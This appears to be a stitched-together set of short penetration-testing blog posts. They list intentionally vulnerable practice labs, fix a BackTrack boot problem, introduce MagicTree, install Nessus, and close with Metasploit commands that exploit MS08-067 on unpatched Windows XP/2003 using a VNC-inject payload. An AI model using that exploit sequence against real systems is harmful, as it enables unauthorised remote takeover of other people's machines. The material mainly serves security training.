These are the steps to follow if there is a necessity to change the Microsoft Office 2010 Product Key
Control Panel >> Add or Remove Programs >> Microsoft Office 2010 >> Change >> Enter New Product Key
– WebGoat, (https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project)
– Gruyere (antigo Codelab), (http://google-gruyere.appspot.com/)
– DVWA (Damn Vulnerable Web App), (http://www.dvwa.co.uk/)
– Hacme, (http://hacmegame.org/)
– Multilidae, (http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10)
. War Games
– Hack This Site (http://www.hackthissite.org/)
– Over the Wire (http://www.overthewire.org/wargames/)
. Insecure Distributions
– Metasploitable, (http://blog.metasploit.com/2010/05/introducing-metasploitable.html)
– de-ICE, (http://de-ice.net/hackerpedia/index.php/De-ICE.net_PenTest_Disks)
– Moth (Bonsai Security Software), (http://www.bonsai-sec.com/en/research/moth.php)
– PwnOS, (http://www.neildickson.com/os/)
– DVL, (http://www.damnvulnerablelinux.org/)
Today I tried to start BackTrack4r2 on a Dell Optiplex 755, but kept getting the error:
unable to locate ioapic at GSx
After a little research I found out that the video drivers weren’t supported. I needed to type “fixvesa” at the prompt, then “startx”.
That did the trick.
Here’s the article
McAffee’s Underground Economy: Intellectual Capital and Sensitive Corporate Data Now the Latest Cybercrime Currency
MagicTree is a penetration tester productivity tool. It is designed to allow easy and straightforward data consolidation, querying, external command execution and report generation. In case you wonder, “Tree” is because all the data is stored in a tree structure, and “Magic” is because it is designed to magically do the most cumbersome and boring part of penetration testing – data management and reporting.
java -jar MagicTree01300.jar
First we need to download Nessus and NessusClient Ubuntu 8.10 packages fromhttp://nessus.org/download/.
Install the Nessus Packages:
root@bt:~# dpkg -i Nessus-4.0.0-ubuntu810_i386.deb
Installing NessusClient is more complicated than installing Nessus Server so we need to download and install some dependencies first.
root@bt:~# apt-get install libqt4-core libqt4-gui libqtcore4 libqt4-network libqt4-script libqt4-xml libqt4-dbus libqt4-test libqtgui4 libqt4-svg libqt4-opengl libqt4-designer libqt4-assistant
root@bt:~# dpkg -i NessusClient-4.0.0-ubuntu810_i386.deb
Now we need to configure Nessus Server:
Make the certificates
Register the scanner here.
/opt/nessus/bin/nessus-fetch –register XXXX-XXXX-XXXX-XXXX-XXXX
Create a Nessus User
Start Nessus Server
Start Nessus Client
Backtrack -> Internet -> NessusClient or from CLI: /opt/nessus/bin/NessusClient
I used Metasploit to exploit the vulnerability in unpatched versions of XPSP2, XPSP3 and 2003. And this is how I did it:
- use exploit/windows/smb/ms08_067_netapi
- show Options
- set Rhost <target computer IP>
- set payload windows/vncinject/bind_tcp